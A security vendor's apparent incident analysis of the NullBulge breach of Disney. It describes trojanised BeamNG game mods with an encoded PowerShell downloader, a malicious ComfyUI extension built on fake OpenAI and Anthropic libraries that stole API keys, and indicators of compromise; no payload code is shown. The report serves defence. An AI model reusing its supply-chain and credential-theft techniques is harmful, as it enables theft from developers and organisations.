Disney Security Breach

How Did Disney Get Hacked?

There are a number of possibilities as to how Disney got hacked by Nullbulge.

The first is due to an insider threat because of what NullBulge has subsequently posted about the hack.
The second is a malware package in either a mod for the Beam.NG game or software called Comfy_LLMVISION - a tool used to visualize LLMs.

Who is Nullbulge?

Nullbulge is a furry hacktivist group that targets companies that use AI tools. Their mission is "protecting artists' rights and ensuring fair compensation for their work." This group is known for using open-source tools like Lockbit payloads, AsyncRAT (a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection), and other info stealers.

ThreatLocker® Investigation

The Insider Threat

According to the blog post that Nullbulge made, they used an insider threat. NullBulge Leaked all this individual's PI (personal information), including the person's password manager, bank info, etc., because they "didn't follow through." This insider threat was a technical lead who would have had access to Slack channels and the ability to export data from Slack.

ThreatLocker® reviewed most of the Nullbulge leaks and the Insider Threat's PI. ThreatLocker® found some evidence that Disney used AI tools for multiple applications, including text and image generation. The insider threat also saved credentials for Disney infrastructure, other AWS (Amazon Web Services) infrastructure, gaming websites, modding websites, etc., in their password manager. Research by ThreatLocker® showed that the Disney leak could have occurred when the password manager credentials were taken when the person installed a malware package from NullBulge on their personal computer.

Malware Packages

ThreatLocker® found two accounts that Nullbulge is known to use, Applebotzz and BeamerNGz, on GitHub. Applebotzz also has an account on a modding website. Applebotzz was confirmed to have been taken by Nullbulge using the first version of their info stealer. This account was then used to spread the info stealer even more—the Beam.NG mods and all the repos from the Applebotzz GitHub had malware packages inside each of them.

BeamNg Mods

The first version of the malware package that was posted to the modding site would download a zip file from BeamerNGz GitHub. The same repo had an AsyncRAT tool called "BeamNG.UI.exe." When looking at other repos that BeamerNGz had, one repository had a lockbit config.json file and a file called main_obf.py.

ThreatLocker® got two mods from Applebotzz account and found that the versioncheck.lua file had a PowerShell encoded payload.

Mod 1 version 1
‍Versioncheck.lua

After Decoding

Mod 1 version 2
Versioncheck.lua

After Decoding

The PowerShell command does have a miss spelling for the invoke-webrequest (PowerShell command that goes to the internet)

Mod 2

Versioncheck.lua

After Decoding

ComfyUI

The Threat Actors hosted a malicious extension for the application ComfyUI. ComfyUI is an application that makes it easier to design neural networks and GPTs by visually describing things such as training. NullBulge hosted a malicious extension called "ComfyUI_LLMVISION." The extension states that it adds modules in ComfyUI for image processing, whether in viewing or producing images.

The source code in the repository is safe. However, it depends on a malicious version of the OpenAI library hosted by the attacker. The version was one minor higher than the official version, making any application that used the OpenAI package run its malicious code. First, it would download and run a malicious executable in the \programdata directory. After that, it sends the API key for OpenAI to the NullBulge discord server and functions like the normal library.

The other library on which the ComfyUI extension depended was a malicious version of Anthropic. This library was less threatening as it only stole the API key for Anthropic and did not add a malicious payload to the system.

IOC

URL: http[:]//pixeldrain[.]com

SHA-256	FileName
fc1443222c765d941e38f6e796f9fd82538ac31ba06322e7534eeccf08f0e2c4	BeamNG.UI.exe
fc1443222c765d941e38f6e796f9fd82538ac31ba06322e7534eeccf08f0e2c4	Mod 2 Versioncheck.lua
66bceb84db56995b05fd175a3f7a79573684e7ca191ba8a3cd1395216fe51e2c	Mod 1 version 2 Versioncheck.lua
77ed83031925faf747e4644f446f0ecfe99c742fb8e49d32bdce0c5508dd1d62	Mod 1 version 1 Versioncheck.lua
35c362965f82d9be9e116643b9e2684c728ec87b55d34bada0a8a98ee6336c22	anthropic-0.26.1-py3-none-any.whl
efb37c08a958772366e8d80f9c19c4b3e026001e59a323ebff18a424df4c034d	openai-1.30.2-py3-none-any.whl
47067e90fc480f76baf40c751ea5577268520fb00fa7ca60bc3460c7907aeafa	VISION-D.exe

Conclusion

Nullbulge compromised Disney, likely through the insider threat downloading a malicious package. Whether it was the ComfyUI extension within the company or leveraging an employee through a downloaded malicious game mod, NullBulge used this access from the employee credentials to gain access to Disney resources.

How do you stay safe?

Increase security around the use of Password managers.
Use MFA on your Password managers.
Be aware of where your exported password manager list is stored – ideally, do not export it at all.
Be wary of mods with low downloads, and check if the user account was made recently.
Be careful of open-source AI tools and review them before implementing them.

How ThreatLocker® Mitigates Risk

Application Allowlisting: Allow only the applications you need to run and block all others by default. This also allows only certain users to use the approved software, preventing unauthorized tools from running on your system.
‍Ringfencing™: Control what your allowed applications can do. For instance, you can prevent PowerShell from accessing the internet and downloading the payload.
‍ThreatLocker® Detect: This can be used to detect anomalous PowerShell behavior.

‍